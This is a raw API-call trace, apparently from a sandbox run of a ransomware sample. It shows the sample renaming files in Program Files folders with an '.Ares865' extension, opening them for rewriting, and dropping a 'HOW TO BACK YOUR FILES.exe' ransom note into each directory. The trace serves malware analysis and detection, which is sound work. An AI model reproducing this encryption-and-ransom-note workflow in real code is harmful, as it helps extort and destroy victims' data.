RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.675] lstrcpyW (in: lpString1=0x2cce462, lpString2="msdfmap.dll" | out: lpString1="msdfmap.dll") returned="msdfmap.dll" [0146.675] lstrlenW (lpString="msdfmap.dll") returned 11 [0146.675] lstrlenW (lpString="Ares865") returned 7 [0146.675] lstrcmpiW (lpString1="map.dll", lpString2="Ares865") returned 1 [0146.675] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll.Ares865") returned 68 [0146.675] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdfmap.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdfmap.dll.ares865"), dwFlags=0x1) returned 1 [0146.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdfmap.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.677] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=45056) returned 1 [0146.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.685] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US" [0146.685] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0146.685] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0146.685] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US") returned 54 [0146.685] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US" [0146.685] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0146.685] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0146.686] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0146.687] GetLastError () returned 0x0 [0146.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0146.687] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0146.687] CloseHandle (hObject=0x120) returned 1 [0146.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0146.687] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0146.687] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x534996a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534996a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0146.687] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0146.687] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0146.687] lstrcpyW (in: lpString1=0x2cce46e, lpString2="msadcer.dll.mui" | out: lpString1="msadcer.dll.mui") returned="msadcer.dll.mui" [0146.688] lstrlenW (lpString="msadcer.dll.mui") returned 15 [0146.688] lstrlenW (lpString="Ares865") returned 7 [0146.688] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0146.688] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui.Ares865") returned 78 [0146.688] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcer.dll.mui.ares865"), dwFlags=0x1) returned 1 [0146.689] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcer.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.690] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9728) returned 1 [0146.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.696] lstrcpyW (in: lpString1=0x2cce46e, lpString2="msadcfr.dll.mui" | out: lpString1="msadcfr.dll.mui") returned="msadcfr.dll.mui" [0146.696] lstrlenW (lpString="msadcfr.dll.mui") returned 15 [0146.696] lstrlenW (lpString="Ares865") returned 7 [0146.696] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0146.696] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui.Ares865") returned 78 [0146.696] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcfr.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcfr.dll.mui.ares865"), dwFlags=0x1) returned 1 [0146.698] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcfr.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.698] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5120) returned 1 [0146.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.703] lstrcpyW (in: lpString1=0x2cce46e, lpString2="msadcor.dll.mui" | out: lpString1="msadcor.dll.mui") returned="msadcor.dll.mui" [0146.703] lstrlenW (lpString="msadcor.dll.mui") returned 15 [0146.703] lstrlenW (lpString="Ares865") returned 7 [0146.703] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0146.703] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui.Ares865") returned 78 [0146.703] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcor.dll.mui.ares865"), dwFlags=0x1) returned 1 [0146.706] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msadcor.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.706] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5632) returned 1 [0146.706] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.706] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.706] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.709] lstrcpyW (in: lpString1=0x2cce46e, lpString2="msaddsr.dll.mui" | out: lpString1="msaddsr.dll.mui") returned="msaddsr.dll.mui" [0146.710] lstrlenW (lpString="msaddsr.dll.mui") returned 15 [0146.710] lstrlenW (lpString="Ares865") returned 7 [0146.710] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0146.710] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui.Ares865") returned 78 [0146.710] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui.ares865"), dwFlags=0x1) returned 1 [0146.711] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.711] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13824) returned 1 [0146.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.716] lstrcpyW (in: lpString1=0x2cce46e, lpString2="msdaprsr.dll.mui" | out: lpString1="msdaprsr.dll.mui") returned="msdaprsr.dll.mui" [0146.716] lstrlenW (lpString="msdaprsr.dll.mui") returned 16 [0146.716] lstrlenW (lpString="Ares865") returned 7 [0146.716] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0146.717] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui.Ares865") returned 79 [0146.717] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui.ares865"), dwFlags=0x1) returned 1 [0146.718] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.718] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0146.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.722] lstrcpyW (in: lpString1=0x2cce46e, lpString2="msdaremr.dll.mui" | out: lpString1="msdaremr.dll.mui") returned="msdaremr.dll.mui" [0146.722] lstrlenW (lpString="msdaremr.dll.mui") returned 16 [0146.722] lstrlenW (lpString="Ares865") returned 7 [0146.722] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0146.722] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui.Ares865") returned 79 [0146.722] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui.ares865"), dwFlags=0x1) returned 1 [0146.725] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.726] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5632) returned 1 [0146.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.729] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\System\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\en-US" [0146.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f60 | out: hHeap=0x2b0000) returned 1 [0146.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0146.729] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\en-US") returned 48 [0146.729] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\en-US" [0146.729] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0146.729] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0146.730] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0146.730] GetLastError () returned 0x0 [0146.730] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0146.730] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0146.730] CloseHandle (hObject=0x120) returned 1 [0146.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0146.730] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0146.730] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x534996a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534996a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0146.730] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0146.730] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0146.731] lstrcpyW (in: lpString1=0x2cce462, lpString2="wab32res.dll.mui" | out: lpString1="wab32res.dll.mui") returned="wab32res.dll.mui" [0146.731] lstrlenW (lpString="wab32res.dll.mui") returned 16 [0146.731] lstrlenW (lpString="Ares865") returned 7 [0146.731] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0146.731] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui.Ares865") returned 73 [0146.731] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\en-us\\wab32res.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\en-us\\wab32res.dll.mui.ares865"), dwFlags=0x1) returned 1 [0146.737] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\en-us\\wab32res.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.737] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=93696) returned 1 [0146.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.750] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\System\\ado", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\ado") returned="C:\\Program Files (x86)\\Common Files\\System\\ado" [0146.750] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2030 | out: hHeap=0x2b0000) returned 1 [0146.750] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0146.750] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\ado") returned 46 [0146.750] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\ado" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\ado") returned="C:\\Program Files (x86)\\Common Files\\System\\ado" [0146.750] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0146.750] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\how to back your files.exe"), bFailIfExists=1) returned 0 [0146.751] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0146.751] GetLastError () returned 0x0 [0146.751] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0146.751] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0146.751] CloseHandle (hObject=0x120) returned 1 [0146.752] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0146.752] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0146.752] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x534bf800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534bf800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0146.752] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0146.752] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0146.752] lstrcpyW (in: lpString1=0x2cce45e, lpString2="adojavas.inc" | out: lpString1="adojavas.inc") returned="adojavas.inc" [0146.752] lstrlenW (lpString="adojavas.inc") returned 12 [0146.752] lstrlenW (lpString="Ares865") returned 7 [0146.752] lstrcmpiW (lpString1="vas.inc", lpString2="Ares865") returned 1 [0146.752] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc.Ares865") returned 67 [0146.752] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adojavas.inc"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adojavas.inc.ares865"), dwFlags=0x1) returned 1 [0146.755] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\adojavas.inc.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adojavas.inc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.755] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14610) returned 1 [0146.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.760] lstrcpyW (in: lpString1=0x2cce45e, lpString2="adovbs.inc" | out: lpString1="adovbs.inc") returned="adovbs.inc" [0146.760] lstrlenW (lpString="adovbs.inc") returned 10 [0146.760] lstrlenW (lpString="Ares865") returned 7 [0146.760] lstrcmpiW (lpString1="vbs.inc", lpString2="Ares865") returned 1 [0146.760] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc.Ares865") returned 65 [0146.760] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adovbs.inc"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adovbs.inc.ares865"), dwFlags=0x1) returned 1 [0146.764] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\adovbs.inc.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\adovbs.inc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.764] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14951) returned 1 [0146.764] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.764] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.764] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.768] lstrcpyW (in: lpString1=0x2cce45e, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0146.768] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0146.768] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2e4788 [0146.768] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0146.768] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: 